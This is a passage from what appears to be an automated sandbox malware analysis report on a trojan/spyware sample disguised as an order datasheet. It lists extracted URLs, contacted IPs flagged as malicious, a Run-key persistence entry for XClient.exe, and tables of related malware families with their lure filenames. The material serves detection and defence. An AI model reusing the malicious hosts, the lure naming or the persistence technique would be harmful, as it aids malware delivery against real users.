http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id5Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-c	ORDERDATASHEET#PO8738763.scr.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id3ResponseD	RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/D	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/06/addressingex	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	RegSvcs.exe, 00000003.00000002.1990031918.0000000007749000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1977732940.0000000006403000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1990031918.000000000773F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1988664588.00000000076B0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	RegSvcs.exe, 00000003.00000002.1990031918.0000000007749000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1977732940.0000000006403000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1990031918.000000000773F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1988664588.00000000076B0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id13Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000003.00000002.1948750396.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1964631054.0000000003B8A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002FB5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002F58000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2002/12/policy	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microC	powershell.exe, 00000004.00000002.1693763957.00000000032F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mi	powershell.exe, 0000000B.00000002.1817419759.00000000075F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id18Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id3Response	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id9	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8	RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
209.90.234.57	unknown	United States	136175	SERVERHOSH-AS-APServerhoshInternetServiceNL	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
195.10.205.94	unknown	Russian Federation	35813	TSSCOM-ASRU	true
107.154.156.233	csg-app.com	United States	19551	INCAPSULAUS	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1464617
Start date and time:	2024-06-29 10:01:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ORDERDATASHEET#PO8738763.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/24@4/6
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 82% Number of executed functions: 388 Number of non-executed functions: 69
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target XClient.exe, PID 4820 because it is empty
Execution Graph export aborted for target XClient.exe, PID 8124 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:02:01	API Interceptor	35x Sleep call for process: powershell.exe modified
04:02:16	API Interceptor	15x Sleep call for process: RegSvcs.exe modified
09:02:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
09:02:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	pTaRVIqjv4.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	HMDmYqWeDO.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	lhPBE8Svmz.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	9rb5IvX2hG.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	1dwaeI6WKB.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	fart.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	ip-api.com/json
	fart.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	ip-api.com/json
	ModStickInjectorV1.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	ip-api.com/line/?fields=hosting
104.26.13.205	242764.exe	Get hash	malicious	Ficker Stealer, Rusty Stealer	Browse	api.ipify.org/?format=wef
	Ransom.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	ld.exe	Get hash	malicious	Targeted Ransomware, TrojanRansom	Browse	api.ipify.org/
	ReturnLegend.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exe	Get hash	malicious	PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	ArenaWarSetup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	E4sbo4F6Sz.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	pTaRVIqjv4.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	HMDmYqWeDO.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	lhPBE8Svmz.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	9rb5IvX2hG.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	1dwaeI6WKB.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	fart.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	208.95.112.1
	fart.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	208.95.112.1
	ModStickInjectorV1.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	208.95.112.1
s82.gocheapweb.com	Request for Quotation.js	Get hash	malicious	AgentTesla	Browse	51.195.88.199
	Revised_June_Order_Document#po839203.js	Get hash	malicious	AgentTesla, SugarDump, XWorm	Browse	51.195.88.199
	RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	141.95.47.215
	Inquiry_GMD_Specifications_7266738879_G#2024.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	141.95.47.215
api.ipify.org	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Find-DscResource_QoS.ps1	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	Find-DscResource_QoS.ps1	Get hash	malicious	Unknown	Browse	104.26.12.205
	PO 5002407962.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	1719573366fe6b75f60e0462a07d2a64837c388e440881e3a858954c94ac42bd405dfa36ab553.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Potwierdzenie zam#U00f3wienia.doc.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.12.205
	Kyeryong Construction - Products List & Spec.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	RFQDOC62824 .vbe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Urgent PO.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe	Get hash	malicious	FormBook	Browse	104.21.26.154
	SIPARIS-270624.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	66.235.200.146
	Fiyat ARH-4532817-PO 45328174563.exe	Get hash	malicious	FormBook	Browse	66.235.200.146
	SIPARIS-270624.exe	Get hash	malicious	Unknown	Browse	162.159.133.233
	MT Marine Tiger.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	vsl particulars packing list.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	new order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	LETTER OF AUTHORIZATION.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
TSSCOM-ASRU	RFQ 10046335 PO 4502042346 PR 11148099 411128.exe	Get hash	malicious	RedLine	Browse	195.10.205.102
	sWXyzk4Kv3.exe	Get hash	malicious	AsyncRAT	Browse	195.10.205.90
	SecuriteInfo.com.Win32.TrojanX-gen.9663.10822.exe	Get hash	malicious	Xmrig	Browse	195.10.205.162
	JCqU250N6g.exe	Get hash	malicious	RedLine	Browse	195.10.205.91
	1f3d6f01961645f.exe	Get hash	malicious	Unknown	Browse	195.10.205.74
	1f3d6f01961645f.exe	Get hash	malicious	Unknown	Browse	195.10.205.74
	Ck5Yckrogl.exe	Get hash	malicious	RedLine	Browse	195.10.205.79
	SD5IYbZmDL.exe	Get hash	malicious	RedLine	Browse	195.10.205.16
	3DmdxH8ksO.exe	Get hash	malicious	LummaC Stealer, PrivateLoader, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	195.10.205.16
	DjZ61wINTx.exe	Get hash	malicious	LummaC Stealer, PrivateLoader, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader, Xmrig	Browse	195.10.205.16
TUT-ASUS	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	pTaRVIqjv4.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	HMDmYqWeDO.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	lhPBE8Svmz.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	9rb5IvX2hG.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	1dwaeI6WKB.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	fart.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	208.95.112.1
	fart.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	208.95.112.1
	ModStickInjectorV1.exe	Get hash	malicious	AsyncRAT, DcRat, Quasar, XWorm	Browse	208.95.112.1
SERVERHOSH-AS-APServerhoshInternetServiceNL	Palmebladstag.exe	Get hash	malicious	Remcos, GuLoader	Browse	209.90.234.58
	01-05-24 remittance.exe	Get hash	malicious	GuLoader	Browse	209.90.233.2
	87tBuE42ft.exe	Get hash	malicious	Remcos, GuLoader	Browse	209.90.234.20
	http://213.139.205.131/update_ver	Get hash	malicious	Unknown	Browse	213.139.205.131
	http://213.139.205.131/w_ver.dat	Get hash	malicious	Unknown	Browse	213.139.205.131
	http://213.139.205.131/update_ver	Get hash	malicious	Unknown	Browse	213.139.205.131
	ReleaseEvans#27.docm	Get hash	malicious	Unknown	Browse	213.139.205.131
	Application#89.docm	Get hash	malicious	Unknown	Browse	213.139.205.131
	ReleaseEvans#90.docm	Get hash	malicious	Unknown	Browse	213.139.205.131
	qvX9Cyuqyq.exe	Get hash	malicious	PureLog Stealer, Vidar, Xmrig	Browse	213.139.207.234
INCAPSULAUS	H34bnq1S0l.elf	Get hash	malicious	Mirai	Browse	45.60.33.155
	original.eml	Get hash	malicious	Unknown	Browse	107.154.76.47
	https://pub-72c93b4a02504d078fc4f9b793c041e9.r2.dev/1.html	Get hash	malicious	Unknown	Browse	45.60.198.180
	https://ko.gl/C7W2G	Get hash	malicious	Unknown	Browse	45.60.198.180
	https://r.inovie.fr/c4p/?74520898?session_state=bae9fb0f-5f60-499c-a7e1-4682d760be5b&code=91bcd4b8-2e1d-439a-8fc4-bde9dd26873a.bae9fb0f-5f60-499c-a7e1-4682d760be5b.5bd06ab8-6759-4ac6-b313-aa4a10aab546?session_state=a4e448ec-cec8-40c1-bd72-4c625a0d66e4&code=5f29a0ef-3fda-4f3c-9912-caf90c48dfcd.a4e448ec-cec8-40c1-bd72-4c625a0d66e4.5bd06ab8-6759-4ac6-b313-aa4a10aab546	Get hash	malicious	Unknown	Browse	45.60.243.185
	TL6bE5Uq4y.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	45.60.76.192
	file.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	45.60.98.44
	http://arvestidentity-bnk.ath.cx/	Get hash	malicious	HTMLPhisher	Browse	45.60.198.180
	C-5793-451D79109.exe	Get hash	malicious	Unknown	Browse	45.60.17.174
	https://arvestrewardscard.embarkdigitalonboarding.com/	Get hash	malicious	Unknown	Browse	45.60.198.180

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe	Get hash	malicious	AgentTesla	Browse	107.154.156.233 104.26.13.205
	DHL Shipping Invoice & Awb8289djuejeeoffffdelivery.vbs	Get hash	malicious	GuLoader, Remcos	Browse	107.154.156.233 104.26.13.205
	SIPARIS-270624.exe	Get hash	malicious	Unknown	Browse	107.154.156.233 104.26.13.205
	RFQ 52165 Materiale vario OENAGROUP.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	107.154.156.233 104.26.13.205
	New Order Ergun Makina Hirdavat Tic #102718.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	107.154.156.233 104.26.13.205
	SIPARIS-270624.exe	Get hash	malicious	Unknown	Browse	107.154.156.233 104.26.13.205
	38iGnQnL33.exe	Get hash	malicious	BlackMoon, DoublePulsar, ETERNALBLUE, GhostRat	Browse	107.154.156.233 104.26.13.205
